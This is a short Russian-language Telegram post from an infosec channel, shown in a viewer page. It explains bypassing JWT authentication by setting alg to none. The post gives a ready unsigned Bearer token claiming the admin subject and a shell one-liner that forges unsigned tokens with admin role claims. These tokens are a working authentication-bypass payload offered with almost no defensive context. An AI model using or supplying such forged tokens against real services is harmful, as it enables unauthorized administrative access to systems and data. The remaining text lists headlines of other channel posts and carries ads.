TGViewer
InfoSec Portal InfoSec Portal @cybersecinform · 19.3K subscribers
Post #8506 2.03K
Обход JWT через alg: none без необходимости подписи.

Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiJ9.

Соответственно измените нужные поля ниже:

echo -n '{"sub":"admin","role":"admin","admin":true}' | base64 | tr -d '=' | xargs -I{} echo "eyJhbGciOiJub25lIn0.{}."


#BugBounty #BrokenAuth

👉 @cybersecinform
  • ❤ 4
  • 💯 4
More from @cybersecinform
  1. Oct 11, 2026Серия статей о том, как устроены компиляторы и LLVM. Четыре части с практическими примерам…
  2. Oct 11, 2026Исследователь обнаружил уязвимость в Lime, позволяющую любому человеку отслеживать маршрут…
  3. Oct 10, 2026Основа простого обхода: 1. Для статического файла не требуется проверка прав доступа. 2. Р…
  4. Oct 10, 2026Хакер, использовавший ИИ для взломов, сам себя деанонимизировал. Он оставил в открытом дос…
  5. Oct 9, 2026Превратите IDA Pro в рабочую среду для реверс-инжиниринга с ИИ: - Мгновенные объяснения фу…
  6. Oct 9, 2026SQL-инъекция через JWT Поле jti (идентификатор JWT) хранится в базе данных, чтобы предотвр…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →